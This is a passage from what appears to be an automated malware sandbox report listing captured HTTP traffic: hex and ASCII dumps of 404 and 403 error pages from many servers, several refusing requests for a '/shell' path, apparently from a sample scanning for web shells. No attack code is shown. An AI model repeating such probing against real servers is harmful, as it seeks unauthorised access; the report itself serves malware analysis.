72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 341Date: Tue, 19 Jul 2022 20:08:42 GMTServer: nawsd/1.0.1-20211228X-Frame-Options: SAMEORIGINData Raw: 3c 3f 78 6d 6c 20 76 65 72 69 73 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 6c 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 6c 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml verison="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <hl>404 Not Found</hl> </body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:41 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:41 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:41 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ZTE web server 1.0 ZTE corp 2015.Accept-Ranges: bytesConnection: closeX-Frame-Options: SAMEORIGINContent-Type: text/html; charset=iso-8859-1X-Content-Type-Options: nosniffCache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Microsoft-IIS/10.0Date: Tue, 19 Jul 2022 11:08:42 GMTContent-Length: 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 19 Jul 2022 11:08:42 GMTContent-Type: text/htmlContent-Length: 33Connection: keep-aliveETag: "5d85581a-21"Data Raw: 75 6e 6b 6e 6f 77 6e 20 28 d0 bd d0 b5 d0 b8 d0 b7 d0 b2 d0 b5 d1 81 d1 82 d0 bd d1 8b d0 b9 29 0a Data Ascii: unknown ()
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:42 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:08:52 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Tue, 19 Jul 2022 11:06:13 GMTContent-Length: 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 19 Jul 2022 11:08:43 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 19 Jul 2022 11:08:45 GMTServer: ApacheContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:45 GMTServer: Apache/2.2.22Vary: Accept-EncodingContent-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 19 Jul 2022 11:08:45 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Tue, 19 Jul 2022 11:08:44 GMTContent-Length: 3257Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 61 